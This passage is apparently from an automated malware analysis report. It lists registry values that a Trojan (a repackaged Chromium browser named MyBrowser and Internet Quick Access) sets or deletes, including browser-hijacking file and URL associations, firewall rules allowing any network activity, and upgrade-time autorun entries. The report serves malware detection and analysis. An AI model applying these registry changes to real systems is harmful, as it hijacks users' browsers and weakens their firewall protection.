"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"

[HKCR\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"

[HKCR\https\shell\open\ddeexec]
"(Default)" = ""

[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 1B B0 07 74 26 45 23 5E 66 36 DD DA 39 C6 F2"

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"

[HKCR\HTTP]
"URL Protocol" = ""

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCR\HTTP\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"

[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"

[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"

[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"

[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"

[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"

[HKCR\https]
"URL Protocol" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"

[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"

[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"

[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"

[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKCR\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"

[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"

The process setup.exe:240 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Chromium]
"pv" = "45.0.2433.0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --show-icons"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Chromium]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --hide-icons"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Chromium]
"InstallerExtraCode1" = "9"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Chromium\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe --on-os-upgrade --verbose-logging"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"NoModify" = "1"

[HKCU\Software\Chromium]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}]
"(Default)" = "CommandExecuteImpl Class"

[HKCR\.xht\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"

[HKCR\.shtml\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Chromium]
"UninstallArguments" = " --uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Chromium]
"ap" = "-stage:refreshing_policy"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --make-default-browser"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\LocalServer32]
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\delegate_execute.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"InstallDate" = "20151029"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium,"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Internet Quick Access"

[HKCU\Software\Chromium]
"oopcrashes" = "1"

[HKCR\.xhtml\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Chromium]
"Name" = "Internet Quick Access"

[HKCR\.htm\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\delegate_execute.exe"

[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe -- %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayName" = "Internet Quick Access"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"

[HKCU\Software\Chromium\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Chromium is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Chromium."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 1C 04 FA C0 62 34 7C 54 3F CA CF 60 26 72 B7"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"ftp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Chromium HTML Document"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe --uninstall"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"Version" = "45.0.2433.0"
"Publisher" = "Internet Quick Access"

[HKCU\Software\Chromium]
"lang" = "en"

[HKLM\SOFTWARE\RegisteredApplications]
"Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\.html\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Chromium]
"InstallerError" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"VersionMajor" = "2433"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application"

[HKCU\Software\Chromium]
"FirstNotDefault" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Chromium]
"InstallerResult" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"VersionMinor" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\.webp\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Internet Quick Access"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"NoRepair" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"nntp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayVersion" = "45.0.2433.0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application]
"Chrome.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe:*:Enabled:Internet Quick Access"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Chromium]
"InstallerExtraCode1"
"ap"

The process tmp24.tmp.exe:1492 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 7E 05 B8 69 B4 3B 11 4E E1 3D 0C 9C 81 58 A1"

The process nsj1B.tmp:1648 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 26 52 E5 0B 91 09 B9 33 24 8A 54 02 07 1A ED"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

The process dwwin.exe:2404 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F CD 2D 88 D3 02 C8 3E DD 6B CB C2 00 61 D4 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
